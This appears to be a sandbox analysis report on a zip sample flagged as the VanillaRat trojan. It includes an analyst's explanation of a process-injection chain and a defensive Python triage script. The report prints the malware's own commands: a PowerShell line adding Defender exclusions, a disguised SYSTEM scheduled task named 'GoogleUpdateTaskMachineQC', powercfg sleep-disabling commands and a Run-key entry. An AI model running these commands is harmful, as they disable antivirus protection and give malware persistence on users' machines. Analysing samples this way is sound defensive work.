Analysis Overview
SHA256
4cf43fb3fd0c9512573a0f601f74101816706cc5e71470ab84e106cf29cbf589
Threat Level: Known bad
The file SynapseFromWish.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanillarat family
Vanilla Rat payload
VanillaRat
Drops file in Drivers directory
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Unsigned PE
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Analysis: static1
Detonation Overview
Reported
2023-09-12 08:29
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
18s
Max time network
81s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3652 created 2748 (4 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3652 set thread context of 1556 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\winlogon.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\lsass.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3652 wrote to memory of 1556 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
| PID 1556 wrote to memory of 616 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\winlogon.exe |
| PID 936 wrote to memory of 3244 (2 identical events) | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe |
| PID 1556 wrote to memory of 668 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\lsass.exe |
| PID 1556 wrote to memory of 964 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\svchost.exe |
| PID 668 wrote to memory of 2608 | N/A | C:\Windows\system32\lsass.exe | C:\Windows\sysmon.exe |
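Read together, the SetThreadContext and WriteProcessMemory tables above describe one injection chain rather than a handful of unrelated events: release-v2.exe (3652) writes into dialer.exe (1556) and then resets a thread context in it, which is the process-hollowing pattern; the hollowed dialer.exe writes into winlogon.exe (616), lsass.exe (668) and svchost.exe (964); and the code planted in lsass.exe writes into sysmon.exe (2608), i.e. the chain ends by reaching into the host's own telemetry agent. The cmd.exe to powercfg.exe write (936 to 3244) is most likely the ordinary write a parent performs into a freshly created child and is not part of that chain. The WerFault.exe rows in the Program crash table (-p 616 and -p 668) are the visible cost of injecting into winlogon and lsass, and the wlrmdr.exe banner in the Win7 run below ("Windows has encountered a critical problem and will restart automatically in one minute") is the notice Windows raises when a critical system process dies. The memory dump list in the Files section records a region of exactly 0x27000 bytes in more than twenty PIDs (668, 616, 964, 384, 540, 700, 1040, 1052, ...), which is the footprint of the same implant being written into a large number of system processes.

The script below is an added example, not part of the sandbox report and not code from the sample. It rebuilds that chain from the signature rows as they appear above (copied into ROWS, with the four identical PPID rows collapsed to one), treats a write plus SetThreadContext from the same source as hollowing, follows write edges transitively from the hollowed process, and flags downstream targets that appear in a list of sensitive processes. The SENSITIVE set and the reading of a "PID A created B" row as PPID spoofing toward the process named in the Target column are my assumptions.

```python
import re
from collections import defaultdict

# Signature rows as they appear in the behavioral4 tables above:
# (signature, description, process, target). Copied from the report, not generated.
ROWS = [
    ("NtCreateUserProcessOtherParentProcess", "PID 3652 created 2748",
     r"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe", r"C:\Windows\Explorer.EXE"),
    ("SetThreadContext", "PID 3652 set thread context of 1556",
     r"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe", r"C:\Windows\System32\dialer.exe"),
    ("WriteProcessMemory", "PID 3652 wrote to memory of 1556",
     r"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe", r"C:\Windows\System32\dialer.exe"),
    ("WriteProcessMemory", "PID 1556 wrote to memory of 616",
     r"C:\Windows\System32\dialer.exe", r"C:\Windows\system32\winlogon.exe"),
    ("WriteProcessMemory", "PID 936 wrote to memory of 3244",
     r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\powercfg.exe"),
    ("WriteProcessMemory", "PID 1556 wrote to memory of 668",
     r"C:\Windows\System32\dialer.exe", r"C:\Windows\system32\lsass.exe"),
    ("WriteProcessMemory", "PID 1556 wrote to memory of 964",
     r"C:\Windows\System32\dialer.exe", r"C:\Windows\system32\svchost.exe"),
    ("WriteProcessMemory", "PID 668 wrote to memory of 2608",
     r"C:\Windows\system32\lsass.exe", r"C:\Windows\sysmon.exe"),
]

# Assumption: processes a user-mode dropper has no legitimate reason to write into.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe", "svchost.exe", "sysmon.exe"}

DESC = re.compile(r"PID (\d+) (wrote to memory of|set thread context of|created) (\d+)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(rows):
    """Split rows into write edges, thread-context edges and PPID-spoof events.
    writes/ctx: {(src_pid, dst_pid): (src_name, dst_name)}
    spoof: [(src_pid, (src_name, claimed_parent_name))]"""
    writes, ctx, spoof = {}, {}, []
    for _sig, desc, proc, target in rows:
        m = DESC.match(desc)
        if not m:
            continue
        src, verb, dst = int(m.group(1)), m.group(2), int(m.group(3))
        names = (basename(proc), basename(target))
        if verb == "wrote to memory of":
            writes[(src, dst)] = names
        elif verb == "set thread context of":
            ctx[(src, dst)] = names
        else:  # "created": assumption, the Target column names the parent the child was attributed to
            spoof.append((src, names))
    return writes, ctx, spoof


def find_hollowing(writes, ctx):
    """A source that both writes into a target and resets one of its threads' context
    is the hollowing / thread-hijack pattern. Returns sorted (src, dst) pairs."""
    return sorted(set(writes) & set(ctx))


def injection_chain(writes, start_pid):
    """Follow write edges transitively from start_pid. Returns [(src, dst, dst_name, depth)]."""
    adj = defaultdict(list)
    for (s, d), (_, dname) in writes.items():
        adj[s].append((d, dname))
    out, seen, stack = [], set(), [(start_pid, 0)]
    while stack:
        pid, depth = stack.pop()
        for d, dname in sorted(adj.get(pid, [])):
            if (pid, d) in seen:
                continue
            seen.add((pid, d))
            out.append((pid, d, dname, depth + 1))
            stack.append((d, depth + 1))
    return out


def triage(rows):
    """Human-readable findings: each hollowed process, the chain it seeds, and PPID spoofing."""
    writes, ctx, spoof = parse_rows(rows)
    findings = []
    for src, dst in find_hollowing(writes, ctx):
        sname, dname = writes[(src, dst)]
        findings.append(f"hollowing: {sname}({src}) -> {dname}({dst})")
        for s, d, tname, depth in injection_chain(writes, dst):
            flag = "SENSITIVE " if tname in SENSITIVE else ""
            findings.append(f"{'  ' * depth}{flag}{s} -> {tname}({d})")
    for src, (sname, parent) in spoof:
        findings.append(f"ppid-spoof: {sname}({src}) attributed its children to {parent}")
    return findings


if __name__ == "__main__":
    print("\n".join(triage(ROWS)))
```

The same edge-building works on Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess with a write/set-context mask) if the description parser is swapped for those fields; the useful signal is not any single cross-process write but a write-plus-context-reset pair whose target then starts writing into lsass, winlogon or the monitoring agent.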
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 616 -ip 616
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 668 -ip 668
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 616 -s 864
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 668 -s 4260
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
Files
memory/3652-0-0x00007FF7F14C0000-0x00007FF7F1AD7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxioahv0.qnx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2476-7-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/2476-6-0x000001B6C8700000-0x000001B6C8722000-memory.dmp
memory/2476-8-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-13-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-14-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-15-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-18-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/1556-21-0x00007FFF312D0000-0x00007FFF314C5000-memory.dmp
memory/1556-22-0x00007FFF2F380000-0x00007FFF2F43E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3516-25-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/3516-24-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/3516-26-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/668-40-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/668-43-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/668-45-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/616-42-0x00007FFF3136D000-0x00007FFF3136E000-memory.dmp
memory/616-39-0x0000020EE5AB0000-0x0000020EE5AD7000-memory.dmp
memory/616-27-0x0000020EE5A80000-0x0000020EE5AA1000-memory.dmp
memory/3652-50-0x00007FF7F14C0000-0x00007FF7F1AD7000-memory.dmp
memory/964-47-0x000001B66BDD0000-0x000001B66BDF7000-memory.dmp
memory/384-48-0x0000020CF4160000-0x0000020CF4187000-memory.dmp
memory/668-53-0x00007FFF3136D000-0x00007FFF3136E000-memory.dmp
memory/668-57-0x00007FFF3136F000-0x00007FFF31370000-memory.dmp
memory/540-56-0x00000298C6980000-0x00000298C69A7000-memory.dmp
memory/384-52-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/964-51-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/964-59-0x000001B66BDD0000-0x000001B66BDF7000-memory.dmp
memory/384-61-0x0000020CF4160000-0x0000020CF4187000-memory.dmp
memory/964-62-0x00007FFF3136C000-0x00007FFF3136D000-memory.dmp
memory/540-58-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/540-63-0x00000298C6980000-0x00000298C69A7000-memory.dmp
memory/700-67-0x00000174C17C0000-0x00000174C17E7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/700-68-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/3516-70-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/1040-74-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1556-77-0x00007FF72C450000-0x00007FF72C479000-memory.dmp
memory/1052-80-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1052-75-0x000001B9EAFD0000-0x000001B9EAFF7000-memory.dmp
memory/1040-78-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1192-85-0x0000016D3F190000-0x0000016D3F1B7000-memory.dmp
memory/1216-90-0x000001AA21E60000-0x000001AA21E87000-memory.dmp
memory/1120-91-0x000001D469FD0000-0x000001D469FF7000-memory.dmp
memory/1192-94-0x0000016D3F190000-0x0000016D3F1B7000-memory.dmp
memory/1216-92-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1052-87-0x000001B9EAFD0000-0x000001B9EAFF7000-memory.dmp
memory/1192-89-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1120-83-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1040-82-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1120-79-0x000001D469FD0000-0x000001D469FF7000-memory.dmp
memory/616-98-0x0000020EE5AB0000-0x0000020EE5AD7000-memory.dmp
memory/1216-96-0x000001AA21E60000-0x000001AA21E87000-memory.dmp
memory/1252-105-0x0000024C9E160000-0x0000024C9E187000-memory.dmp
memory/668-114-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/3516-110-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/1388-109-0x000001AB3CDB0000-0x000001AB3CDD7000-memory.dmp
memory/1252-108-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1372-111-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1372-106-0x0000025AAA2C0000-0x0000025AAA2E7000-memory.dmp
memory/3516-115-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/3516-120-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/1252-131-0x0000024C9E160000-0x0000024C9E187000-memory.dmp
memory/1372-140-0x0000025AAA2C0000-0x0000025AAA2E7000-memory.dmp
memory/1388-142-0x000001AB3CDB0000-0x000001AB3CDD7000-memory.dmp
memory/1460-127-0x000001CD86290000-0x000001CD862B7000-memory.dmp
memory/1452-143-0x000001A706040000-0x000001A706067000-memory.dmp
memory/1604-144-0x0000019FB1740000-0x0000019FB1767000-memory.dmp
memory/1568-145-0x000002278F590000-0x000002278F5B7000-memory.dmp
memory/1648-154-0x000001F149ED0000-0x000001F149EF7000-memory.dmp
memory/700-150-0x00000174C17C0000-0x00000174C17E7000-memory.dmp
memory/1784-159-0x000002510DB40000-0x000002510DB67000-memory.dmp
memory/1688-163-0x00000209F7A90000-0x00000209F7AB7000-memory.dmp
memory/1896-169-0x000002AE98CB0000-0x000002AE98CD7000-memory.dmp
memory/1908-174-0x0000012919B30000-0x0000012919B57000-memory.dmp
memory/1800-181-0x000001EA6B170000-0x000001EA6B197000-memory.dmp
memory/1952-178-0x0000023418960000-0x0000023418987000-memory.dmp
memory/1040-187-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1964-184-0x000001C89C090000-0x000001C89C0B7000-memory.dmp
memory/3516-188-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:31
Platform
win7-20230831-en
Max time kernel
112s
Max time network
113s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2948 created 1248 (6 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\PerfStringBackup.TMP | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\system32\PerfStringBackup.INI | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\perfh007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2948 set thread context of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
(The twelve-privilege sequence above, SeAssignPrimaryTokenPrivilege through SeManageVolumePrivilege, is recorded for C:\Windows\system32\svchost.exe three more times in full and a fourth time that stops after SeRestorePrivilege; the repeated rows are omitted here.)
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
injector.exe
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
release-v2.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\schtasks.exe
